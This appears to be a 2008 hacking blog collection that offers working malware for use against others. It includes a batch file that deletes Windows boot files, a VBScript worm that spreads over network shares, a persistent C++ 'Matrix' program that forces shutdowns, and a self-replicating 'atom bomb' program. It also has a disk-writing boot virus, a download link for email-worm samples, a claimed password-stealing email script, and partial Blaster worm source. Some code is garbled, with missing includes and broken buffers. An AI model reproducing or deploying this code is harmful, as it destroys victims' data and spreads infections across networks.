In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

Sunday, August 3, 2008

Remove ur NTDLR

A Virus Code That Will Crash Ur Computer
Just copy the code given belows ....in notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * U R Screwed!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

and now save this code as anyname.bat like abc.bat

when u double click on it....a message will pop up saying " U R Screwed"

and it will shut down ur computer and never boot again...
Enjoy

Thursday, July 31, 2008

VBScript Worm

VBScript Worm

The script resides in the StartUp group of the Start Menu and is therefore run at each reboot. The filename is NETWORK.VBS. (Note: There's a valid file by that name on many systems. Read on before you look for the file.)

The script creates a log file, C:\NETWORK.LOG, which it erases and re-creates upon each new execution.

The script generates a random Class C subnet address and enters it in the log. This address is the first three numbers of the usual four-part IP address. It then steps thru all 255 addresses in that subnet. It blindly attempts to map a shared C: drive at the remote address to local drive letter J: at each address in turn. It checks each time to verify the successful creation of a drive J: on its host.

ok, save as .exe

If U accidentally open this worm, u can save urself. Do a re-boot and go to a cmd/DoS promp and type this

CODE
ren \windows\startm~1\programs\startup\network.vbs network.txt

Here’s tha code:

CODE
dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject
on error resume next
randomize
checkfile ()
randaddress ()
checkaddress ()
shareformat ()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives ()
copyfiles()
disconnectdrive()
msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile "c:\network.vbs", "j:\"

If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\windows\"

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\wind95\"

end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count > 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
octa="255"
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function

Cheers,

MATRIX WORM

MATRIX WORM

Ok, if ur wondering how to work this bad ass worm, following these easy steps.

1. copy and paste codes down below.
2. paste the codes into a text document and save as .exe
3. DO NOT, open up this file or ur fucked. this worm wont let u boot up ur pc and wipes out everything.

~I suggest u burn onto a disc and give to a friend~ xD

CODE
// The Matrix Virus

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

E-mail Worms

▌▌▌Email-Worm(S) ▌▌▌

Email-Worm.Win32.Zafi.d
Email-Worm.Win32.VB.aq.
Email-Worm.Win32.Swen.
Email-Worm.Win32.Sobig.f
Email-Worm.Win32.Sober.i
Email-Worm.Win32.Sober.g
Email-Worm.Win32.Sober.f
Email-Worm.Win32.Sober.d
Email-Worm.Win32.Sober.a
Email-Worm.Win32.Siney.b
Email-Worm.Win32.Saros.b
Email-Worm.Win32.Rous.a.
Email-Worm.Win32.Rous.a (ASM Source and Binary)
Email-Worm.Win32.Redist.b
Email-Worm.Win32.Redist.a
Email-Worm.Win32.Rays
Email-Worm.Win32.Pikachu
Email-Worm.Win32.Nyxem.e
Email-Worm.Win32.NetSky.q
Email-Worm.Win32.NetSky.d
Email-Worm.Win32.NetSky.aa
Email-Worm.Win32.Mydoom.q
Email-Worm.Win32.Mydoom.m
Email-Worm.Win32.Mydoom.l
Email-Worm.Win32.Mydoom.am
Email-Worm.Win32.Mydoom.a
Email-Worm.Win32.Merkur.d
Email-Worm.Win32.Ganter.c
Email-Worm.Win32.Ganter.b
Email-Worm.Win32.Ganter.a
Email-Worm.Win32.Ganda
Email-Worm.Win32.Dumaru.a
Email-Worm.Win32.Drefir.e
Email-Worm.Win32.Drefir.c
Email-Worm.Win32.Delf.l
Email-Worm.Win32.Bagle.z
Email-Worm.Win32.Bagle.y
Email-Worm.Win32.Bagle.ai
Email-Worm.Win32.Bagle.ae
Email-Worm.VBS.Thery.b
Email-Worm.VBS.Polsev.a#6
Email-Worm.VBS.Junkboat.b
Email-Worm.VBS.Junkboat.a
Email-Worm.VBS.Jerm.b
Email-Worm.VBS.Evan
Email-Worm.VBS.Craytron
Email-Worm.VBS.Alien.d
Email-Worm.Beagle.Azag
Email-Worm.BAT.Eversaw
Email-Worm.BAT.Calhob
Email-Worm.BAT.Baatezu (variants).zip

CODE
http://www.4shared.com/file/32673748/51de5fef/Email-Worm.html

Atom bomb virus in c

Atom bomb virus in c

Basically, the goal of this "virus" is to either a) use A LOT of ram or b)fill the hard drive with useless files > 100kb's, whichever may come first (in most cases it is option A )

The idea behind an atom bomb virus is that it will create two (or more) exact copies of itself (like splitting an atom) and then execute those two files. In this one, it creates 500 exact copies and runs them.

QUOTE
#define W32_LEAN_AND_MEAN
#define TSARSTRUCT 1052
#include
#include
#include
#include

// character string to generate random filename
char *beg[65] = {
"a","b","c","d","e","f","g","h","i","j","k","l","m","n",
"o","p","q","r","s","t","u","v","w","x","y","z","A","B",
"C","D","E","F","G","H","I","J","K","L","M","N","O","P",
"Q","R","S","T","U","V","W","X","y","Z","1","2","3","4",
"5","6","7","8","9","0","-","_"
};
int ret = 0;
// ret is our control integer
// we will only go through 500 times to save ram.

char *path = "";

char * getpath()
{
char *path = (char*)malloc(1024);
HINSTANCE hinst = GetModuleHandle(NULL); //get our module handle
GetModuleFileName(hinst,path,1024);
return path;
}

void genfile()
{
srand(time(NULL));
int len = rand() % 25;
int b;
// generate random number from 1-50
char buff;
strcpy(&buff," ");
// clear buffer
int x = 0;
srand(time(NULL));
/*This is going to go into
a non ending loop*/
#ifndef TSARSTRUCT
return;
#endif
while (1) {
x++;
b = rand() % 65;
//get random number from 1-85
strcat(&buff,(const char*)beg);
// concat to the end of the buffer the value of the character
if (x==len)
{
strcat(&buff,".exe");
strcpy(&path,&buff);
return;
}
}
}

void Atom()
{
// we will now split the atom!
ret++; // increment ret
char pat, *pt;
genfile(); //generate filename
pt = &pat;
if (path=="")
return;
pt = getpath(); // get the path to our file
CopyFile((LPCTSTR)pt,(LPCTSTR)path,0);
// here we copy the file to the random filename generated path
// then we will restart
ShellExecute(0,"open",(const char*)path,NULL,NULL,SW_HIDE);
// this will execute the copied file
if (ret==500)
return; //if our shelled number is equal to 500 we will end
}

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
#ifdef TSARSTRUCT
return 0;
#endif
Atom();
return 0;
}

Wednesday, July 30, 2008

chinese virus

// Test.cpp
//
#include "stdafx.h"

//==============================================================================
#include
typedef struct _PARTITION_ENTRY
{
UCHAR active;
UCHAR StartHead;
UCHAR StartSector;
UCHAR StartCylinder;
UCHAR PartitionType;
UCHAR EndHead;
UCHAR EndSector;
UCHAR EndCylinder;
ULONG StartLBA;
ULONG TotalSector;
} PARTITION_ENTRY, *PPARTITION_ENTRY;

//==============================================================================
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;

//==============================================================================
typedef struct _BBR_SECTOR
{
USHORT JmpCode;
UCHAR NopCode;

UCHAR OEMName[8];

// BPB( BIOS Parameter Block )

USHORT BytesPerSector;
UCHAR SectorsPerCluster;
USHORT ReservedSectors;
UCHAR NumberOfFATs;
USHORT RootEntries;
USHORT NumberOfSectors16;
UCHAR MediaDescriptor;
USHORT SectorsPerFAT16;
USHORT SectorsPerTrack;
USHORT HeadsPerCylinder;
ULONG HiddenSectors;
ULONG NumberOfSectors32;

// EBPB ( Extended BIOS Parameter Block )

ULONG SectorsPerFAT32;
} BBR_SECTOR, *PBBR_SECTOR;

#include

#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C

//==============================================================================
#define STR_SYSFILE_PATH TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME TEXT("\\\\.\\PhysicalHardDisk0")

//==============================================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)

//==============================================================================
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
return errCode;
}

//==============================================================================
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}

//==============================================================================

DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512];
UCHAR diskBuf[512];
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
//
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn;
if(!dwVcnExtents)
{
errCode = (ULONG)(-3);
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4);
goto FunExit02;
}
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// ?????????
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
//
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0x80)
{
errCode = (ULONG)(-1);
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2);
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512;

SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;

diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;

SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5);
goto FunExit03;
}

dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen);

if(!lpClusterBuf)
{
errCode = GetLastError();
goto FunExit03;
}

if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0x00401000,
0x73E,
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}

SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}

//==============================================================================
int _tmain(int argc, _TCHAR* argv[])
{
TCHAR filePath[MAX_PATH];
DWORD errCode;
if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL))))
{
MessageBox(NULL, TEXT("couldn't work"), NULL, MB_ICONERROR);
goto FunExit00;
}
ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
WriteVirusToDisk(filePath);
StopAndDeleteDriver();
FunExit00:
return 0;
}

A GodDamn Virus code

How to use: This script can only be sent with hotmail, however you can send it to yahoo, aim, and so on. So open ur hotmail account. Now copy the script bellow and paste it in a new email (hotmail), and send it. It might apear in the bulk of the user you sent it to.

It will shutdown the computer of the victim u send this script and the password of the victims ids password will be sent to u when the victim opens this script in his inbox or junk mailbox.(the script is tested and it is fully working)

if any body want this code contact me
on :-ansarilucky@ymail.com

C++ worm, the source code of the blaster worm

#include

#include /*IP_HDRINCL*/

#include /*InternetGetConnectedState*/

#include

#pragma comment (lib, "ws2_32.lib")

#pragma comment (lib, "wininet.lib")

#pragma comment (lib, "advapi32.lib")

/*

* These strings aren't used in the worm, I put them here

* so that whitehat researchers would discover them.

*/

const char msg1[]="billy gates why do you make this possible ?"

" Stop making money and fix your software!!";

#define MSBLAST_EXE "msblast.exe"

/*

* MS-RPC/DCOM runs over port 135.

* DEFENSE: firewalling port 135 will prevent systems from

* being exploited and will hinder the spread of this worm.

*/

#define MSRCP_PORT_135 135

/*

* The TFTP protocol is defined to run on port 69. Once this

* worm breaks into a victim, it will command it to download

* the worm via TFTP. Therefore, the worms briefly runs a

* TFTP service to deliver that file.

* DEFENSE: firewalling 69/udp will prevent the worm from

* fully infected a host.

*/

#define TFTP_PORT_69 69

/*

* The shell-prompt is established over port 4444. The

* exploit code (in the variable 'sc') commands the victim

* to "bind a shell" on this port. The exploit then connects

* to that port to send commands, such as TFTPing the

* msblast.exe file down and launching it.

* DEFENSE: firewalling 4444/tcp will prevent the worm from

* spreading.

*/

#define SHELL_PORT_4444 4444

/*

* A simple string to hold the current IP address

*/

char target_ip_string[16];

/*

* A global variable to hold the socket for the TFTP service.

*/

int fd_tftp_service;

/*

* Global flag to indicate this thread is running. This

* is set when the thread starts, then is cleared when

* the thread is about to end.

* This demonstrates that Buford isn't confident with

* multi-threaded programming -- he should just check

* the thread handle.

*/

int is_tftp_running;

/*

* When delivering the worm file to the victim, it gets the

* name by querying itself using GetModuleFilename(). This

* makes it easier to change the filename or to launch the

* worm. */

char msblast_filename[256+4];

int ClassD, ClassC, ClassB, ClassA;

int local_class_a, local_class_b;

int winxp1_or_win2k2;

ULONG WINAPI blaster_DoS_thread(LPVOID);

void blaster_spreader();

void blaster_exploit_target(int fd, const char *victim_ip);

void blaster_send_syn_packet(int target_ip, int fd);

/***************************************************************

* This is where the 'msblast.exe' program starts running

***************************************************************/

void main(int argc, char *argv[])

{

WSADATA WSAData;

char myhostname[512];

char daystring[3];

char monthstring[3];

HKEY hKey;

int ThreadId;

register unsigned long scan_local=0;

/*

* Create a registry key that will cause this worm

* to run every time the system restarts.

* DEFENSE: Slammer was "memory-resident" and could

* be cleaned by simply rebooting the machine.

* Cleaning this worm requires this registry entry

* to be deleted.

*/

RegCreateKeyEx(

/*hKey*/ HKEY_LOCAL_MACHINE,

/*lpSubKey*/ "SOFTWARE\\Microsoft\\Windows\\"

"CurrentVersion\\Run",

/*Reserved*/ 0,

/*lpClass*/ NULL,

/*dwOptions*/ REG_OPTION_NON_VOLATILE,

/*samDesired */ KEY_ALL_ACCESS,

/*lpSecurityAttributes*/ NULL,

/*phkResult */ &hKey,

/*lpdwDisposition */ 0);

RegSetValueExA(

hKey,

"windows auto update",

0,

REG_SZ,

MSBLAST_EXE,

50);

RegCloseKey(hKey);

/*

* Make sure this isn't a second infection. A common problem

* with worms is that they sometimes re-infect the same

* victim repeatedly, eventually crashing it. A crashed

* system cannot spread the worm. Therefore, worm writers

* now make sure to prevent reinfections. The way Blaster

* does this is by creating a system "global" object called

* "BILLY". If another program in the computer has already

* created "BILLY", then this instance won't run.

* DEFENSE: this implies that you can remove Blaster by

* creating a mutex named "BILLY". When the computer

* restarts, Blaster will falsely believe that it has

* already infected the system and will quit.

*/

CreateMutexA(NULL, TRUE, "BILLY");

if (GetLastError() == ERROR_ALREADY_EXISTS)

ExitProcess(0);

/*

* Windows systems requires "WinSock" (the network API layer)

* to be initialized. Note that the SYNflood attack requires

* raw sockets to be initialized, which only works in

* version 2.2 of WinSock.

* BUFORD: The following initialization is needlessly

* complicated, and is typical of programmers who are unsure

* of their knowledge of sockets..

*/

if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0

&& WSAStartup(MAKEWORD(1,1), &WSAData) != 0

&& WSAStartup(1, &WSAData) != 0)

return;

/*

* The worm needs to read itself from the disk when

* transferring to the victim. Rather than using a hard-coded

* location, it discovered the location of itself dynamically

* through this function call. This has the side effect of

* making it easier to change the name of the worm, as well

* as making it easier to launch it.

*/

GetModuleFileNameA(NULL, msblast_filename,

sizeof(msblast_filename));

/*

* When the worm infects a dialup machine, every time the user

* restarts their machine, the worm's network communication

* will cause annoying 'dial' popups for the user. This will

* make them suspect their machine is infected.

* The function call below makes sure that the worm only

* starts running once the connection to the Internet

* has been established and not before.

* BUFORD: I think Buford tested out his code on a machine

* and discovered this problem. Even though much of the

* code indicates he didn't spend much time on

* testing his worm, this line indicates that he did

* at least a little bit of testing.

*/

while (!InternetGetConnectedState(&ThreadId, 0))

Sleep (20000); /*wait 20 seconds and try again */

/*

* Initialize the low-order byte of target IP address to 0.

*/

ClassD = 0;

/*

* The worm must make decisions "randomly": each worm must

* choose different systems to infect. In order to make

* random choices, the programmer must "seed" the random

* number generator. The typical way to do this is by

* seeding it with the current timestamp.

* BUFORD: Later in this code you'll find that Buford calls

* 'srand()' many times to reseed. This is largely

* unnecessary, and again indicates that Buford is not

* confident in his programming skills, so he constantly

* reseeds the generator in order to make extra sure he

* has gotten it right.

*/

srand(GetTickCount());

/*

* This initializes the "local" network to some random

* value. The code below will attempt to figure out what

* the true local network is -- but just in case it fails,

* the initialization fails, using random values makes sure

* the worm won't do something stupid, such as scan the

* network around 0.0.0.0

*/

local_class_a = (rand() % 254)+1;

local_class_b = (rand() % 254)+1;

/*

* This discovers the local IP address used currently by this

* victim machine. Blaster randomly chooses to either infect

* just the local ClassB network, or some other network,

* therefore it needs to know the local network.

* BUFORD: The worm writer uses a complex way to print out

* the IP address into a string, then parse it back again

* to a number. This demonstrates that Buford is fairly

* new to C programming: he thinks in terms of the printed

* representation of the IP address rather than in its

* binary form.

*/

if (gethostname(myhostname, sizeof(myhostname)) != -1) {

HOSTENT *p_hostent = gethostbyname(myhostname);

if (p_hostent != NULL && p_hostent->h_addr != NULL) {

struct in_addr in;

const char *p_addr_item;

memcpy(&in, p_hostent->h_addr, sizeof(in));

sprintf(myhostname, "%s", inet_ntoa(in));

p_addr_item = strtok(myhostname, ".");

ClassA = atoi(p_addr_item);

p_addr_item = strtok(0, ".");

ClassB = atoi(p_addr_item);

p_addr_item = strtok(0, ".");

ClassC = atoi(p_addr_item);

if (ClassC > 20) {

/* When starting from victim's address range,

* try to start a little bit behind. This is

* important because the scanning logic only

* move forward. */

srand(GetTickCount());

ClassC -= (rand() % 20);

}

local_class_a = ClassA;

local_class_b = ClassB;

scan_local = TRUE;

}

}

/*

* This chooses whether Blaster will scan just the local

* network (40% chance) or a random network (60% chance)

*/

srand(GetTickCount());

if ((rand() % 20) < 12)

scan_local = FALSE;

/*

* The known exploits require the hacker to indicate whether

* the victim is WinXP or Win2k. The worm has to guess. The

* way it guesses is that it chooses randomly. 80% of the time

* it will assume that all victims are WinXP, and 20% of the

* time it will assume all victims are Win2k. This means that

* propogation among Win2k machines will be slowed down by

* the fact Win2k machines are getting DoSed faster than they

* are getting exploited.

*/

winxp1_or_win2k2 = 1;

if ((rand()%10) > 7)

winxp1_or_win2k2 = 2;

/*

* If not scanning locally, then choose a random IP address

* to start with.

* BUG: this worm choose bad ranges above 224. This will

* cause a bunch of unnecessary multicast traffic. Weird

* multicast traffic has historically been an easy way of

* detecting worm activity.

*/

if (!scan_local) {

ClassA = (rand() % 254)+1;

ClassB = (rand() % 254);

ClassC = (rand() % 254);

}

/*

* Check the date so that when in the certain range, it will

* trigger a DoS attack against Micosoft. The following

* times will trigger the DoS attack:

* Aug 16 through Aug 31

* Spt 16 through Spt 30

* Oct 16 through Oct 31

* Nov 16 through Nov 30

* Dec 16 through Dec 31

* This applies to all years, and is based on local time.

* FAQ: The worm is based on "local", not "global" time.

* That means the DoS attack will start from Japan,

* then Asia, then Europe, then the United States as the

* time moves across the globe.

*/

#define MYLANG MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)

#define LOCALE_409 MAKELCID(MYLANG, SORT_DEFAULT)

GetDateFormat( LOCALE_409,

0,

NULL, /*localtime, not GMT*/

"d",

daystring,

sizeof(daystring));

GetDateFormat( LOCALE_409,

0,

NULL, /*localtime, not GMT*/

"M",

monthstring,

sizeof(monthstring));

if (atoi(daystring) > 15 && atoi(monthstring) > 8)

CreateThread(NULL, 0,

blaster_DoS_thread,

0, 0, &ThreadId);

/*

* As the final task of the program, go into worm mode

* trying to infect systems.

*/

for (;;)

